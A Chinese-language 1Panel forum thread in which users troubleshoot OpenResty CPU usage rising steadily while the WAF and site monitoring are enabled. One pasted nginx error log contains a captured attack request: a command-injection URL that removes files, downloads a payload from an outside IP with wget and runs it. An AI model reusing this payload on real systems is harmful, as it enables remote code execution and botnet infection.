有没有发现openresty的cpu的占用会慢慢的越来越高？

user-7c5jhd5nhdk · 2024 年6 月 25 日 07:30

1Panel-huiwan · 2024 年6 月 26 日 03:12

你多大配置的机器？

user-7c5jhd5nhdk · 2024 年6 月 26 日 06:44

2核3g

1Panel-huiwan · 2024 年6 月 26 日 06:44

如果你有网站监控和 WAF 关闭他然后再看看

user-7c5jhd5nhdk · 2024 年6 月 26 日 06:48

好，我关掉waf再观察两天。

user-7c5jhd5nhdk · 2024 年6 月 27 日 00:51

从昨天到今天的观察确是和waf有关系

1Panel-huiwan · 2024 年6 月 27 日 02:06

进程管理中 Openresty 的 CPU 占用能到多少

user-7c5jhd5nhdk · 2024 年6 月 27 日 02:38

24个小时能到65%以上

user-7c5jhd5nhdk · 2024 年6 月 27 日 02:40

我早上8点多又打开waf到现在又这么多了

1Panel-huiwan · 2024 年6 月 27 日 02:57

openresty 日志有报错吗

user-7c5jhd5nhdk · 2024 年6 月 27 日 03:23

没有报错，今天到现在就这么多日志：
2024/06/26 14:49:11 [notice] 10#10: http file cache: /www/common/proxy/proxy_cache_dir 884.047M, bsize: 4096
2024/06/26 14:49:11 [notice] 1#1: signal 17 (SIGCHLD) received from 10
2024/06/26 14:49:11 [notice] 1#1: cache loader process 10 exited with code 0
2024/06/26 14:49:11 [notice] 1#1: signal 29 (SIGIO) received
2024/06/27 02:40:40 [error] 7#7: 349501 open() “/usr/share/nginx/html/shell” failed (2: No such file or directory), client: 36.153.235.150, server: 127.0.0.1, request: "GET /shell?cd+/tmp;rm±rf+;wget+45.128.232.15/jaws;sh+/tmp/jaws HTTP/1.1", host: “127.0.0.1:80”
2024/06/27 08:53:02 [notice] 1#1: signal 1 (SIGHUP) received from 17, reconfiguring
2024/06/27 08:53:02 [notice] 1#1: reconfiguring
2024/06/27 08:53:02 [notice] 1#1: [lua] config.lua:112: ini_waf_info(): Load 1Panel WAF Version:1.0.0
2024/06/27 08:53:02 [notice] 1#1: using the “epoll” event method
2024/06/27 08:53:02 [notice] 1#1: start worker processes
2024/06/27 08:53:02 [notice] 1#1: start worker process 23
2024/06/27 08:53:02 [notice] 1#1: start worker process 24
2024/06/27 08:53:02 [notice] 1#1: start cache manager process 25
2024/06/27 08:53:06 [notice] 8#8: gracefully shutting down
2024/06/27 08:53:06 [notice] 9#9: exiting
2024/06/27 08:53:06 [notice] 9#9: exit
2024/06/27 08:53:06 [notice] 1#1: signal 17 (SIGCHLD) received from 9
2024/06/27 08:53:06 [notice] 1#1: cache manager process 9 exited with code 0
2024/06/27 08:53:06 [notice] 1#1: signal 29 (SIGIO) received
2024/06/27 08:53:06 [notice] 8#8: exiting
2024/06/27 08:53:07 [notice] 7#7: gracefully shutting down
2024/06/27 08:53:06 [notice] 8#8: exit
2024/06/27 08:53:07 [notice] 1#1: signal 17 (SIGCHLD) received from 8
2024/06/27 08:53:07 [notice] 1#1: worker process 8 exited with code 0
2024/06/27 08:53:07 [notice] 1#1: signal 29 (SIGIO) received
2024/06/27 08:53:08 [notice] 7#7: exiting
2024/06/27 08:53:08 [notice] 7#7: exit
2024/06/27 08:53:08 [notice] 1#1: signal 17 (SIGCHLD) received from 7
2024/06/27 08:53:08 [notice] 1#1: worker process 7 exited with code 0
2024/06/27 08:53:08 [notice] 1#1: signal 29 (SIGIO) received

1Panel-huiwan · 2024 年6 月 27 日 03:27

好的我们排查一下

凌尘 · 2024 年8 月 13 日 02:43

我也遇到过这种情况。
我的服务器配置是V.PS服务商的8H16G。
现在我关闭了WAF与网站监控，如果打开这两个，CPU占用会飙升到40%+。单核经常100%。进程中可以看到CPU占用在100%以上。容器资源资源使用率中也可以看到如此情况，CPU的占用在100%以上。当然这不是一直处于这个么高的水平，而是偶尔。我查看过它的日志没有什么问题，网站访问中也没有什么人访问。WAF拦截记录的大多是未授权域名访问与恶意 IP 组。每天拦截数目大概在500条。每天还在逐渐增多。
我已经因为CPU的高负债被服务商强制关机过两次，一次是gitea造成，第二次是这个原因。服务商那边发了工单和邮件要求我处理，下一次就会删除终止服务器。
我有一个疑惑，既然都有恶意 IP 组策略，为什么没有直接加入黑名单的选项呢？

user-zqliwyaaabm · 2024 年8 月 14 日 09:01

这个问题比较严重的，我大概几天后就会直接飙升到100%，单核心占用。

1Panel-huiwan · 2024 年8 月 14 日 09:32

感谢建议 V2 版本优化一波

凌尘 · 2024 年8 月 20 日 09:45

不知道我现在回复对你们优化的工作还有没有用。
我当日评论后进行了一个测试。发现了一个对我而言很有用的解决方案，但不是一个好方案。
在我测试的过程中，发现这么一个情况，这个CPU突然高占用的问题与日志量有关。当我清空拦截记录后，CPU突然高负载的情况次数有了一定的下降，同样删除封锁记录后，效果更好，出现高负债异常的情况次数就更少了。我没有对监控报表进行详细的开关影响测试，暂不清楚情况。
而且我对比了初始安装没有开启过与开启过但后面关闭了WAF与监控报表的两种情况。我当日测试完后就将服务器重要数据备份到nas上了。然后重置了vps，再进行数据恢复。重置了系统后环境干干净净的机器安装1p与openresty与我原来有了一定WAF拦截与封锁记录积累发现异常后关闭了两个功能的openresty，两者进行对比，后者明显占用更高。而且哪怕是我关了，有时候也会占用突然起来，虽然频率不高且CPU占用情况也不会是之前经常的100%。

1Panel-huiwan · 2024 年8 月 20 日 09:49

很有用感谢您的反馈

user-cuwgmvzcfgo · 2024 年8 月 20 日 12:47

我服务器之前CPU占用5%不到，安装1panel 开启waf后 cpu直接日常占用30-40%。可以说大部分cpu都是这东西给占了。

这东西能优化吗。感觉买了个专业版变成负优化。

user-cuwgmvzcfgo · 2024 年8 月 20 日 13:05

看这cpu占的

1Panel-huiwan · 2024 年8 月 20 日 14:27

会优化的你可以先删除日志文件